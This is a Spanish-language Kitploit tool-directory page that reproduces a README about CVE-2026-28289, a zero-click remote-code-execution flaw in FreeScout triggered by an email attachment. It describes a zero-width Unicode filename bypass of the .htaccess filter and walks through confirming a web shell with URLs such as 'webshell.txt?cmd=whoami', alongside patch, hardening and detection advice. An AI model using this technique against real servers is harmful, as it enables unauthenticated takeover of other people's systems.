Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2026-28289
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de PayloadsSeguridad de Correo Electrónico
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

Ver Repositorio
15hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2026-28289 — “Mail2Shell”

1772564185117

RCE sin autenticación y sin clic en FreeScout mediante omisión de archivo adjunto por correo electrónico

Severity CVSS Affected Patched


📖 Resumen

CVE-2026-28289, apodada Mail2Shell, es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) sin clic que afecta a FreeScout.

Un atacante puede enviar un correo electrónico especialmente diseñado a un buzón de FreeScout y obtener acceso remoto a la terminal del servidor subyacente, sin autenticación y sin interacción del usuario.


🧠 Resumen de la vulnerabilidad

Descargar herramienta
CampoValor
CVE IDCVE-2026-28289
Severidad🔴 Crítico
CVSS10.0 (Máximo)
Vector de ataqueRemoto (Correo electrónico)
Autenticación requerida❌ Ninguno
Interacción del usuario❌ Ninguna
ImpactoCompromiso total del servidor

⚙️ Desglose técnico

📨 Paso 1 — Entrega de correo electrónico malicioso

El atacante envía un correo electrónico con un archivo adjunto especialmente diseñado.

🧩 Paso 2 — Omisión de la sanitización de nombres de archivo

FreeScout intenta bloquear archivos peligrosos como .htaccess, pero el atacante:

  • Antepone un carácter Unicode de ancho cero
  • Omite la validación del nombre de archivo
  • El archivo se guarda como un archivo ejecutable válido del servidor

💣 Paso 3 — Ejecución remota

El atacante accede al archivo subido a través de la ruta web y ejecuta comandos arbitrarios.

Resultado:

root@kitploit:~
# Remote shell access achieved
whoami
www-data

✅ Si la operación es exitosa, esto es EXACTAMENTE lo que verá (paso a paso):

mail2shell

1. En su terminal (justo después de ejecutar el script)

root@kitploit:~
✅ Email sent successfully! (Zero-Click RCE triggered)

2. Cuando ejecute el comando find en su servidor FreeScout vía SSH

Devolverá inmediatamente la ruta real completa al archivo subido, por ejemplo:

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

3. La PRUEBA real de éxito — en su navegador (este es el momento en que sabe que tiene RCE completa)

Copie la ruta del paso 2 y abra esta URL:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

Verá exactamente esta salida (texto plano):

root@kitploit:~
www-data

(O el usuario de Apache/PHP que sea en su servidor — normalmente www-data, apache o nobody).

Ahora cambie el comando y actualice:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

Verá:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Y para ls -la:

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

Esta salida aparece directamente en la página del navegador (dentro de etiquetas <pre> de la web shell). Sin error, sin código fuente PHP, sin 404.

Esto significa que tiene ejecución remota de código completa en el servidor — la omisión de .htaccess + espacio de ancho cero funcionó perfectamente, y el archivo adjunto se procesó sin ninguna interacción del usuario.


🎯 Por qué esto es peligroso

  • ⚡ Explotación sin clic
  • 🌐 Superficie de ataque remota (correo electrónico)
  • 🔓 Sin necesidad de autenticación
  • 🧨 Capacidad de RCE completa
  • 📂 Potencial exfiltración de datos
  • 🔁 Movimiento lateral dentro de redes internas

📦 Versiones afectadas

Todas las versiones de FreeScout:

root@kitploit:~
<= 1.8.206

✅ Versión parcheada

Actualice inmediatamente a:

root@kitploit:~
1.8.207 o posterior

🛡️ Pasos de mitigación

1️⃣ Acción inmediata

  • Actualice FreeScout a la última versión

2️⃣ Endurecer el servidor web

  • Deshabilitar AllowOverride All en la configuración de Apache
  • Restringir la ejecución dentro de los directorios de archivos adjuntos

3️⃣ Monitorear registros

Busque:

  • Archivos .htaccess sospechosos
  • Cargas de archivos adjuntos inusuales
  • Intentos de acceso directo a /storage/attachments/

🔍 Consejos de detección

Los indicadores de compromiso pueden incluir:

  • Archivos .htaccess desconocidos en carpetas de archivos adjuntos
  • Picos de tráfico saliente
  • El servidor web generando procesos de shell
  • Solicitudes POST/GET sospechosas a rutas de archivos adjuntos

🧪 Prueba de concepto (conceptual)

root@kitploit:~
Email → Malicious Attachment (Unicode prefixed filename)
        ↓
Saved to predictable path
        ↓
Web-accessible execution
        ↓
Remote shell

📌 Vulnerabilidad relacionada

Este problema omitió las protecciones añadidas en:

  • CVE-2026-27636

Demostrando la lógica incompleta de sanitización de nombres de archivo.


📊 Evaluación de impacto

Área de riesgoImpacto
Confidencialidad🔴 Alto
Integridad🔴 Alto
Disponibilidad🔴 Alto

🧩 Lecciones aprendidas

  • El manejo de Unicode debe normalizarse antes de la validación
  • Nunca confiar únicamente en el filtrado de nombres de archivo
  • Los directorios de archivos adjuntos nunca deben permitir la ejecución de código
  • Los vectores sin clic son superficies de ataque de alto riesgo

📚 Referencias

  • Aviso de seguridad de FreeScout
  • Entrada NVD para CVE-2026-28289

🚨 Recomendación final

Si ejecuta una instancia autoalojada de FreeScout:

🔥 Parche inmediatamente. 💡 Asuma compromiso si ejecuta versiones vulnerables expuestas a Internet. 🛡 Realice revisión de registros y comprobaciones de integridad.